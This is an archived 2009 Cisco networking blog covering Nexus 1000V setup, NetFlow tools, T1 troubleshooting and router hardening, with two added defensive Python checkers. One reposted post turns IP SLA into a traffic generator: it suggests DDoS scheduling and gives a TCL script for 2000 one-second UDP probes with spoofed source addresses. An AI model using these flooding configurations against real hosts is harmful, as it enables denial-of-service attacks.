Pete’s Packet

I don’t think I can. I know I can!

Cisco NetPro is getting a much needed facelift.

Posted by Peter Kurdziel on November 9, 2009

I was invited to Cisco’s office in New York City to share my thoughts and opinions on the new NetPro site. There will be a forum, blog, wiki and maybe a NetPro certification.

I liked the new site and I am looking forward to the launch.
 

Posted in Routing & Switching Lab

Narbik’s CCIE Routing & Switching Trouble Shooting Workbook – SAMPLE LAB

Posted by Peter Kurdziel on November 6, 2009

http://www.micronicstraining.com/classes/index.php?dispatch=products.view&product_id=29829

The CCIE Routing and Switching troubleshooting mock labs workbook
contains 10 lab scenarios designed to prepare CCIE candidates for
the new Troubleshooting section of the CCIE R&S lab exam. Every lab
contains 15 trouble tickets, plus a brain teaser question. The solution
contains a detailed explanation with “show” and “debug” commands, and most
of the trouble tickets are tested. This workbook is written by Narbik
Kocharians (Triple CCIE) and Dan Schetcher (Triple CCIE).

This workbook is in FULL color and comes as a secure PDF with no printing option.

See Download Free Sample Chapter at the bottom of the page.

http://www.micronicstraining.com/classes/index.php?dispatch=products.view&product_id=29829

Posted in Routing & Switching Lab

Nexus 1000v initial setup

Posted by Peter Kurdziel on October 27, 2009

For installation see the 1000V demo videos:
Part 1 – VSM Install
http://vimeo.com/5719299
Part 2 – Connecting the VSM to vCenter
http://vimeo.com/5721462
Part 3 – Configuring Uplink Port Profiles
http://vimeo.com/5746855
Part 4 – Installing the VEM
http://vimeo.com/5792424

Connecting the Nexus 1000V to VMware vCenter:

N1KV-1# config t
N1KV-1(config)# svs connection vc
N1KV-1(config-svs-conn)# remote ip address 192.168.189.128 <-- IP address of vCenter
N1KV-1(config-svs-conn)# protocol vmware-vim <-- this is the only protocol available
N1KV-1(config-svs-conn)# vmware dvs datacenter-name DC <-- the datacenter name
N1KV-1(config-svs-conn)# connect <-- connect to vCenter
Note: Command execution in progress..please wait

Configuring uplink port profiles:

N1KV-1# config t
N1KV-1(config)# port-profile system-uplink
N1KV-1(config-port-prof)# switchport mode trunk
N1KV-1(config-port-prof)# switchport trunk allowed vlan add 51,52
N1KV-1(config-port-prof)# no shutdown
N1KV-1(config-port-prof)# channel-group auto sub-group cdp <-- if you use multiple physical NICs
N1KV-1(config-port-prof)# system vlan 51,52 <-- add the control and packet VLANs created in vSphere
N1KV-1(config-port-prof)# capability uplink
N1KV-1(config-port-prof)# vmware port-group
N1KV-1(config-port-prof)# state enabled <-- enable the profile

N1KV-1(config)# vlan 53 <-- define a new VLAN for VMs to use
N1KV-1(config-vlan)# name VM-Data
N1KV-1(config-vlan)# exit

N1KV-1(config)# port-profile data-uplink <-- for data traffic
N1KV-1(config-port-prof)# switchport mode trunk
N1KV-1(config-port-prof)# switchport trunk allowed vlan add 53
N1KV-1(config-port-prof)# no shutdown
N1KV-1(config-port-prof)# channel-group auto sub-group cdp <-- if you use multiple physical NICs
N1KV-1(config-port-prof)# vmware port-group
N1KV-1(config-port-prof)# state enabled <-- pushes the port profile to the vCenter server
Note: Processing command..

N1KV-1(config)# port-profile Test-VM <-- for VM traffic
N1KV-1(config-port-prof)# switchport mode access
N1KV-1(config-port-prof)# switchport access vlan 53 <-- the VM-Data VLAN defined earlier
N1KV-1(config-port-prof)# no shutdown
N1KV-1(config-port-prof)# vmware port-group
N1KV-1(config-port-prof)# state enabled <-- pushes the port profile to the vCenter server
Note: Processing command..
N1KV-1(config-port-prof)# end

You will also need to install the VEM (Virtual Ethernet Module) code on the vSphere hosts.

Posted in Uncategorized

Netflow tools

Posted by Peter Kurdziel on October 27, 2009

Stager is a system for aggregating and presenting network statistics.
Stager is generic and can be customized to present and process any kind
of network statistics. The backend collects data and stores reports in
a database, automatically handling the aggregation of hourly statistics
into days, weeks, and months. The Web frontend presents data in tables,
matrices, or plots. The reports are fully customizable, and their
definitions are stored in an XML file.

http://software.uninett.no/stager/

The nfdump tools collect and process NetFlow data on the command line.
http://nfdump.sourceforge.net/

NfSen is a graphical web based front end for the nfdump
netflow tools.
http://nfsen.sourceforge.net/

Posted in Other, Real World, Security

Layer 1 Voice T1 Troubleshooting

Posted by Peter Kurdziel on October 27, 2009

Common problems

- Misconfiguration at one end
- Switch type must match
- Channels must match
- Clock must be opposite
- ISDN protocol-emulate must be opposite
- Dial peers coordinated

Layer 1 – needs to match

- Framing – ESF or SF (aka D4)
- Line coding – B8ZS (use with ESF) or AMI (use with SF)
- Cable length – can induce attenuation if needed for short cables
- Clocking – MUST be set correctly – one side provides to the other
- Channels in use – depends on protocol and call-control agent

Troubleshooting commands for ISDN PRI

- show controller t1 x/y
- show voice port summary
- show isdn status (shows Layer 1 and Layer 2 status)
- show dialplan number {digits}
- debug isdn q921
- debug isdn q931 (most useful to see signaling)
- debug voice ccapi inout

T1 CAS (Channel Associated Signaling)

Layer 1 – needs to match (the same framing, line coding, cable length, clocking and channel requirements as listed for ISDN PRI above)

Troubleshooting commands for T1-CAS

- show controller t1 x/y
- show voice port summary
- show dialplan number {digits}
- debug vpm signal (to see CAS signaling)
- debug voice dspapi (to see the digits at low level)
- debug voice ccapi inout

Ref: Cisco techtorial
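As an added example (not from the techtorial or this post), a small checker that reads the `show controller t1` output from both ends of a link and applies the layer-1 rules listed above; the two outputs are constructed and abbreviated.

```python
"""Layer-1 T1 check from both ends' 'show controller t1' output.

Added example, not from the post or from Cisco: it parses the
'Framing is ..., Line Code is ..., Clock Source is ...' line that
'show controller t1' prints and applies the rules listed above: framing
and line coding must match on both ends, B8ZS goes with ESF and AMI
with SF, and exactly one side must provide clock. The two outputs
below are constructed and abbreviated to the lines the checker reads.
"""
import re

SIDE_A = """\
T1 0/0/0 is up.
  Applique type is Channelized T1
  Cablelength is long 0db
  No alarms detected.
  Framing is ESF, Line Code is B8ZS, Clock Source is Line.
"""
SIDE_B = """\
T1 0/1/0 is down.
  Applique type is Channelized T1
  Cablelength is long 0db
  Receiver has loss of frame.
  Framing is SF, Line Code is AMI, Clock Source is Line.
"""

LINE_RE = re.compile(
    r"Framing is (?P<framing>\w+), Line Code is (?P<linecode>\w+), "
    r"Clock Source is (?P<clock>\w+)"
)

# Line coding that normally goes with each framing format (from the post).
VALID_PAIRS = {"ESF": "B8ZS", "SF": "AMI"}


def parse_controller(text):
    """Return {'framing', 'linecode', 'clock', 'up'} from show controller t1 text."""
    match = LINE_RE.search(text)
    if not match:
        raise ValueError("no 'Framing is ... Clock Source is ...' line found")
    settings = {k: v.upper() for k, v in match.groupdict().items()}
    settings["up"] = bool(re.search(r"^T1 \S+ is up\.", text, re.M))
    return settings


def check_link(a, b):
    """Return the layer-1 problems between two parsed ends (empty list if clean)."""
    problems = []
    if a["framing"] != b["framing"]:
        problems.append(f"framing mismatch: {a['framing']} vs {b['framing']}")
    if a["linecode"] != b["linecode"]:
        problems.append(f"line code mismatch: {a['linecode']} vs {b['linecode']}")
    for name, side in (("A", a), ("B", b)):
        expected = VALID_PAIRS.get(side["framing"])
        if expected and side["linecode"] != expected:
            problems.append(f"side {name}: {side['framing']} framing normally uses "
                            f"{expected}, found {side['linecode']}")
    clocks = {a["clock"], b["clock"]}
    if clocks == {"LINE"}:
        problems.append("clocking: both ends take clock from the line, nobody provides it")
    elif clocks == {"INTERNAL"}:
        problems.append("clocking: both ends provide clock, they must be opposite")
    return problems


if __name__ == "__main__":
    for problem in check_link(parse_controller(SIDE_A), parse_controller(SIDE_B)):
        print("-", problem)
```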

Posted in Troubleshooting

Cisco SLA Packet Samples – generate traffic

Posted by Peter Kurdziel on October 26, 2009

cisco ip sla attack

IP SLA
With the IP SLA function in IOS there is another way to create packets to a specific port and target. Normally it is used for
testing the availability of services and/or devices, but I think there is a chance for abuse.
See some of my ideas.
- what if we create 1000 SLAs on the same router
- create a TCL script for creating the 1000 SLAs
- create scheduled SLAs for a DDoS at a defined time
- create random DNS or HTTP queries

Cisco SLA Packet Samples

SLA Sample TCP Port
tcp connections to 192.168.1.1 port 99 every 1 second

	ip sla 1
	 tcp-connect 192.168.1.1 99 control disable
	 threshold 1
	 timeout 1
	 frequency 1
	ip sla schedule 1 life 300 start-time now

SLA Sample UDP Port
udp connections to 192.168.1.1 port 100 from source IP 1.2.3.4 and source port 12345 every 1 second

	ip sla 2
	 udp-echo 192.168.1.1 100 source-ip 1.2.3.4 source-port 12345 control disable
	 threshold 1
	 timeout 1
	 frequency 1
	ip sla schedule 2 life 300 start-time now

SLA Sample ICMP
tcp connections to 192.168.1.1 port 100 every 1 second

	ip sla 3
	 icmp-echo 192.168.1.1
	 threshold 1
	 timeout 1
	 frequency 1
	ip sla schedule 3 life 300 start-time now

SLA Sample FTP
FTP to check if a file is on an FTP server

	ip sla 11
	 ftp get ftp://user:password@host/file_name
	!
	ip sla schedule 11 start-time now

SLA Sample HTTP
HTTP connections to 192.168.1.1 port 100 every 1 second with file index.html
(Limit: minimum frequency for HTTP should be 60 sec)

	ip sla 4
	 http get http://192.168.2.100/index.html
	 threshold 1
	 timeout 1
	 frequency 60
	ip sla schedule 4 life 300 start-time now

SLA Sample HTTP (RAW)
HTTP connections to 192.168.1.1 every 1 second with RAW code
(Limit: minimum frequency for HTTP should be 60 sec)

	ip sla 5
	 http raw http://192.168.1.1
	 http-raw-request
	  GET /ch/index.html HTTP/1.0\r\n\r\n
	  exit
	 threshold 1
	 timeout 1
	 frequency 60
	ip sla schedule 5 life 300 start-time now

SLA Sample DNS
DNS request for www.laber.com every 9 seconds to DNS server 192.168.1.1
Minimum frequency for the DNS operation should be 9

	ip sla 6
	 dns www.laber.com name-server 192.168.1.1
	 timeout 1
	 threshold 1
	 frequency 9
	ip sla schedule 6 life 300 start-time now

Schedule the SLA

	ip sla schedule 1 start-time 10:00:00 life 300 recurring    <- every day at 10:00 for 300 seconds
	ip sla schedule 2 start-time now life forever               <- start now and run forever
	ip sla schedule 3 start-time 10:00:00 1 Jan life 1000       <- start on 1 Jan for 1000 seconds

Play around with the options: source-ip and source-port, lifetime, threshold etc.
For testing with source-ip and source-port, the source IP must NOT exist on a loopback interface.
For flooding it’s required that you enter “control disable”. For HTTP or DNS requests you cannot
enable or disable “control”, because there is no “CISCO” responder.

TCL script with SLA packets

Script Sample UDP
This TCL script creates 2000 “ip sla” entries in the config file; each
one creates every second a UDP packet to the target host 192.168.1.1 and
destination port 100 for 5 minutes (300 seconds).
Warning: uses a lot of CPU power, and depending on your hardware, 2000 is too much.

	puts "Creating UDP"
	set count 2000
	for {set X 1} {$X<$count} {incr X} {
	puts $X
	ios_config "ip sla $X" "udp-echo 192.168.1.1 100 control disable" "threshold 1" "timeout 1" "frequency 1"
	ios_config "ip sla schedule $X life 300 start-time now"
	}

and for removing all entries

	puts "Deleting"
	set count 2000
	for {set X 1} {$X<$count} {incr X} {
	puts $X
	ios_config "no ip sla $X "
	}

New Sample with Source-Port and Source-IP

	puts "Creating UDP"
	set count 2000
	for {set X 1} {$X<$count} {incr X} {
	puts $X
	ios_config "ip sla $X" "udp-echo 192.168.1.1 100 source-ip 1.2.3.4 source-port 12345 control disable" "threshold 1" "timeout 1" "frequency 1"
	ios_config "ip sla schedule $X life 300 start-time now"
	}

Send binary data

With the http raw option it’s possible to send TEXT and binary code
to a selectable port (source IP and port are changeable too).
You can send 0x01 with the string \x01 in the http-raw-request.

Sample:

	ip sla 1
	 http raw http://laber.peanuts.ch:445
	 http-raw-request
	  \x01\x02\x03\x48\x41\x4C\x4C\x4F\xff
	  exit
	!
	ip sla schedule 1 start-time now

Known Problem
Currently I have found NO way to send a “NULL” (0x00), arghh…

Known Limits
– max 1280 chars in the config file
– max 252 chars per line
– \x23 for sending #
– \x?? reduces the max packet length

Strange things…

Some strange things, maybe features or bugs?
1. It’s possible to set the TOS to 255, but in the DSCP field of the packets I see only the 6 DSCP bits set.

	evil-router(config-ip-sla-tcp)#tos ?
	  <0-255>  Type of Service Value

2. Some problem with the order in the config file and the dependency between timeout and threshold.
If you configure timeout 1 and threshold 1, you must configure threshold before timeout, but afterwards
you see the following in the configuration file: timeout is before threshold.

	ip sla 4
	 tcp-connect 192.168.2.100 98 control disable
	 tos 1
	 timeout 1
	 threshold 1
	 frequency 1
	ip sla schedule 4 life 60 start-time now

and after a restart you see the following boot message:

	1 DSL controller
	9 FastEthernet interfaces
	1 ISDN Basic Rate interface
	62720K bytes of ATA CompactFlash (Read/Write)
	Installed image archive
	%Error: timeout value is less than threshold 5000
	%Illegal Value: Cannot set Frequency to be less than Timeout
	%Error: timeout value is less than threshold 5000
	%Illegal Value: Cannot set Frequency to be less than Timeout

	Press RETURN to get started!

I see this on my Cisco 1800 router:

	evil-router#sh version
	Cisco IOS Software, C180X Software (C180X-ADVIPSERVICESK9-M), Version 12.4(22)T, RELEASE SOFTWARE (fc1)
	Technical Support: http://www.cisco.com/techsupport

Update (05.01.2009):
Tests with other routers and different IOS versions show me that this must be a BUG in this version on my Cisco 1800 router.

 
Cisco Documentation

threshold milliseconds
(Optional) Sets the upper threshold value for calculating network monitoring statistics created by an IP SLAs operation.
Example:
Router(config-sla-monitor-echo)# threshold 10000

timeout milliseconds
(Optional) Sets the amount of time an IP SLAs operation waits for a response from its request packet.
Example:
Router(config-sla-monitor-echo)# timeout 10000

Source:
http://www.packetlevel.ch/html/cisco/ciscoslahack.html

Posted in Troubleshooting

Online web-based ping: remote ping a server or web site using our network with 38 checkpoints worldwide

Posted by Peter Kurdziel on October 24, 2009

http://just-ping.com

Posted in Troubleshooting

Tutorial: BGP/MPLS Layer 3 VPNs

Posted by Peter Kurdziel on October 24, 2009

Posted in BGP, MPLS, VPN

Cisco Games – Become a CEO. Change the World. Play Cisco myPlanNet.

Posted by Peter Kurdziel on October 23, 2009

Come check out Cisco myPlanNet 1.0. Cisco myPlanNet 1.0 is a simulation game that puts you into the shoes of a service provider CEO. You manage your business as it evolves from the stone age of dial-up, through the broadband and mobile connected eras, and into the dawning of the medianet age. Play it now on the Cisco Learning Network games arcade.

The Cisco Mind Share Game: The Cisco Mind Share Game is the most comprehensive learning game from Cisco yet! This fun and challenging game covers more than half the content of the CCENT/CCNA exam and was designed to reinforce a variety of standard networking skills and help you practice these new skills in preparation for the CCENT and CCNA Cisco certification exams.


Cisco myPlanNet 1.0 is a simulation game in which you play a service-provider CEO who must manage the company as it evolves from the “stone age” of dial-up, through the broadband- and mobile-connected eras, into the dawning of the “medianet age.” Connect your citizens with the next-generation IP network and guide them into the Connected Life with the wonders of visual networking. Reach for the top and engage in discussions with your fellow players.


Subnet Troubleshooting Game: If you enjoyed Cisco’s popular Subnet game, try the next step – the Subnet Troubleshooting game! Diagnose and fix the subnet scheme for an operational network while minimizing impact to users. Hone your subnetting skills as you work your way up from branch office to corporate headquarters.


 

Multiplayer Challenge (in SPANISH, too!): Play online with other players or against the computer and see if all your studying has paid off! Prepare for your certification and have a blast while you do! Contains questions from the CCENT, CCNA, CCNP, CCDP and CCVP certifications in the following courses: ARCH, BGP, BSCI, CVOICE, ICND-1, ICND-2, MPLS and QOS.

Press “CCNA (es)” to play in Spanish.

The Binary Game: Come play the game enjoyed by hundreds of thousands of people all over the world. This game is posted on dozens of game sites and played in more than 125 countries. The game is not only fun, but it is considered by many to be the best way to learn how to use the binary number system.


Cisco Edge Quest: Online game introducing the new Cisco ASR 1000 Series Routers. Players maneuver a router craft through various levels and increasingly use the power of the Cisco ASR 1000 Series Router to defend the network edge!


Network Defenders: Puts you in control of your company’s network security. It’s a hostile world out there and malicious hackers are trying to get into your network and wreak havoc on your data. Learn about the risks and how to guard against them.


SAN Rover: The research station on Mars needs a robust network to store and manage the exploration data being generated. You have been assigned to build a Storage Area Network (SAN) for the station. Command the Rover to tread the hostile terrain of the Red Planet.


Secure Volunteer: You have chosen to volunteer for NetHope, a nonprofit consortium of leading international organizations that provide connectivity in the developing world. You find out when you arrive that the director has been looking for you.


The Cisco Subnet Game: Master the often-challenging world of subnetting! Helpful if you are preparing for a Cisco CCENT or CCNA Certification or just trying to understand subnetting better for your job.


Subnet Slingshot: You will be working with one of the maintenance droids to replace the gravity core on one of Outpost Athens’ decks that is in rough shape. You have to work fast or the ship’s deck will lose gravity.


Unified Communications Simulation Challenge: As CIO of My, Inc., it is up to you to choose the migration path to produce the highest productivity and efficiency by migrating to IP voice, video, and collaboration using Cisco Unified Communications applications.


Wireless Explorer: Your spacecraft, equipped with the latest wireless technologies, is docking on planet Berellius Prime. You must welcome aboard an envoy of alien scientists sent to study the latest technologies on Earth and configure open wireless access to the ship’s mainframe correctly for each alien.


IPC Rockin’ Retailer: You manage the employees of IP Beats, a music store and live performance venue. Despite the success of IP Beats, the communications and inventory systems are highly outdated. Learn how to configure the Cisco IP Communications Solution to address IP Beats’ needs and be a company hero with your boss.


Peter Packet: This superhero helps messages move across the Internet. Follow him on his exciting adventures along the Internet highway. Play the game and learn how the Internet works to help Peter bring important life-saving messages to different locations worldwide. With your help, he can overcome hackers and viruses to help kids in different places around the globe.


The Realm: Though this is not actually a game, but more of a colorful comic-book-like experience, we thought we’d provide a link here for your entertainment. “Welcome to the Digital Era on Earth, where a new class of criminal has emerged. To stop these menaces, a select group of Cisco engineers has been appointed to develop a state-of-the-art security force that must battle Botnets, Malware, Spam and Intruders, assuring the safety and security of every citizen in the human network.”



Posted in Routing & Switching Lab

Cisco Config Best Practices

Posted by Peter Kurdziel on October 22, 2009

Router configuration Best Practices

DOCUMENT- DOCUMENT- DOCUMENT

I cannot stress that enough. Always get a copy of the current running config and keep it in a safe place. I had one router that a vendor configured; I just happened to get a copy for my records. 5 months later they took a power hit and, guess what, the vendor had never saved the config to NVRAM. Without my notes, this would have been very bad.

To protect against a “smurf” attack use the following interface command:
!
no ip directed-broadcast
!

Other easy security measures are:
!
no service tcp-small-servers
no service udp-small-servers
!

You should have names that make sense. Just an IP, or nothing at all, makes troubleshooting much more difficult than it needs to be.

To configure the host name:

router(config)# hostname california_wan ; note the lower case. Not all software can handle uppercase correctly, so lower case is “safer”

Remember that SNMP can get this name from the sysName variable so again, use a name that makes sense.

Interfaces:

Always, always use a description for each interface. A very good idea with WAN links is to use the circuit number as part of the description. When you are on the phone trying to troubleshoot a down link, this small detail can be a lifesaver for you.
Including the contact and phone number adds to your workload, as this information tends to be rather transitory nowadays.

!
interface serial 0.1 point-to-point
description San Francisco to New York PVC, circuit 001BHAC56789-001
ip address 123.456.789.1
!

You can see how easy this is to read, and when you are trying to troubleshoot problems this is what you want: nice clear descriptions.

Get into the habit of specifying the bandwidth even if it’s not needed. Some protocols, like OSPF, use the bandwidth to compute their metrics.

If your link is slower than 256K, you *may* want to use the following command to make more buffer available, depending on the link load:
!
no ip route-cache
!

Always configure a loopback address. This provides several positive things:
- OSPF will by default use the loopback as the router ID (otherwise it uses the highest IP address). If you plan this right, you can make your OSPF router IDs make sense: 10.10.10.1, 10.10.10.2, 10.10.10.3, etc.
- Also with OSPF, each time a link “flaps” all the routers must recalculate the route changes. Since the loopback doesn’t “flap”, the network will be more stable.
- You can telnet to it without regard to whether a physical interface is “up” or not. SNMP polling is the same thing.
- A stable interface is very important to protocols like SNA, which is very sensitive to time delays and outages. This also applies to DLSW, STUN and RSRB.
- IP or PPP from a laptop if you find yourself in a bind.

SNMP

SNMP is one of those double-edged swords. It can be very useful, but dangerous to your peace of mind if not handled well. SNMP has two types of communities: Read Only and Read/Write. The read/write one is the dangerous one. With this string you are god on the router, and there is not any password checking (normally).
Read/write SNMP is a way to get out of the nasty box of configuring the enable password and then promptly forgetting it or mistyping it. Not that this EVER happens (don’t ask how I know this one).

It is very easy to configure:

router(config)# snmp-server community string RO ; read-only SNMP string
router(config)# snmp-server community string RW ; read/write SNMP string

Do NOT use common names, your name, words like sex and the like. There are dictionary based SNMP crackers out there so be careful with your choices. Better yet, get a cracker and look at the dictionary to get an idea of what is in them.

I always use snmp-server chassis-id with the serial number to ID the router, so I can get the SN remotely.

You can specify access lists to restrict the number of workstations with access to the SNMP info.

!
access-list 60 permit 123.456.789.1 0.0.0.0 ; limits access to a single IP
!

If you want to be very paranoid then consider the following command:

!
snmp-server trap-authentication
!

This sends traps to your management station whenever an invalid community string is tried. Fun, huh?

A very good friend is called SYSLOG. This is a great way to get a nice log file about things that happen to interfaces, events and debugging. I happen to use a Wintel syslog daemon from Kiwi software. There are many to choose from for both Wintel and Unix/Linux.
To work with syslog, use the following commands.

!
logging on
logging buffered
!
logging 123.456.789.1 ; the IP address is the syslog management workstation
!

CDP

Very useful to both you and hackers. So the rule is: if you plan to use it (good idea), make sure you turn it OFF on any outside interfaces.

!
interface ethernet 0
ip address 123.456.789.2 255.255.255.0
no cdp enable
!

Telnet access is something many people ignore. It’s perfectly acceptable to lock down your telnet ports to some degree. Just don’t make it too restrictive (like having to hit a certain router then bounce back).
Use a strong password; again, not common names etc. Don’t leave printouts of the running-config lying around. There are several password crackers that can be used to compromise your passwords if you give someone a chance.

!
access-list 1 permit 1.2.3.0 0.0.0.255
!
line vty 0 4
access-class 1 in
login
password xxxxx
exec-timeout 5 0
!
Source: http://www.tek-tips.com/faqs.cfm?fid=404
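An added audit script (not part of this FAQ, of the IP SLA post above, or of Cisco) that checks a running-config for the hardening items in this post and also flags the one-second, control-disabled IP SLA pattern from the IP SLA post; the sample config is constructed and the outside-interface names are an assumption passed in by the caller.

```python
"""Audit an IOS running-config for the items in the two posts above.

Added example, not from either post or from Cisco: it splits the config into
top-level blocks, checks this post's best-practice items (small servers, directed
broadcast, interface descriptions, CDP on outside interfaces, vty access-class,
read/write SNMP community) and counts IP SLA operations matching the IP SLA
post's traffic-generator pattern (frequency 1 with control disable). The config
is constructed; which interfaces are "outside" is an assumption the caller passes.
"""

SAMPLE_CONFIG = """\
service tcp-small-servers
!
interface Serial0.1 point-to-point
 description San Francisco to New York PVC, circuit 001BHAC56789-001
 ip address 10.1.1.1 255.255.255.252
!
interface Ethernet0
 ip address 192.0.2.2 255.255.255.0
 ip directed-broadcast
!
snmp-server community private RW
ip sla 1
 udp-echo 192.0.2.50 100 control disable
 frequency 1
ip sla 2
 icmp-echo 192.0.2.50
 frequency 60
line vty 0 4
 login
 password xxxxx
"""


def parse_blocks(config):
    """Return [(header, [indented child lines])] per top-level config line."""
    blocks = []
    for line in config.splitlines():
        if not line.strip() or line.startswith("!"):
            continue
        if line.startswith(" ") and blocks:
            blocks[-1][1].append(line.strip())
        elif not line.startswith(" "):
            blocks.append((line.strip(), []))
    return blocks


def audit(config, outside_interfaces=("Ethernet0",)):
    """Return sorted findings; an empty list means every check passed."""
    blocks = parse_blocks(config)
    headers = {h for h, _ in blocks}
    findings, generators = [], 0
    for svc in ("tcp", "udp"):
        if f"no service {svc}-small-servers" not in headers:
            findings.append(f"service {svc}-small-servers not explicitly disabled")
    for header, body in blocks:
        if header.startswith("interface "):
            name = header.split()[1]
            if not any(ln.startswith("description") for ln in body):
                findings.append(f"{name}: missing description")
            if "ip directed-broadcast" in body:
                findings.append(f"{name}: directed broadcast enabled (smurf amplifier)")
            if name in outside_interfaces and "no cdp enable" not in body:
                findings.append(f"{name}: CDP still enabled on outside interface")
        elif header.startswith("line vty"):
            if not any(ln.startswith("access-class") for ln in body):
                findings.append(f"{header}: no access-class restricting telnet")
        elif header.startswith("snmp-server community") and header.endswith(" RW"):
            findings.append("read/write SNMP community configured")
        elif header.startswith("ip sla ") and header.split()[2].isdigit():
            # One-second probes with the control channel off: the flood pattern.
            if "frequency 1" in body and any("control disable" in ln for ln in body):
                generators += 1
    if generators:
        findings.append(f"{generators} IP SLA operation(s) probing every second with control disable")
    return sorted(findings)
```

Run `audit(SAMPLE_CONFIG)` to list the findings; a config that passes every check returns an empty list.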

Posted in Best practices, Real World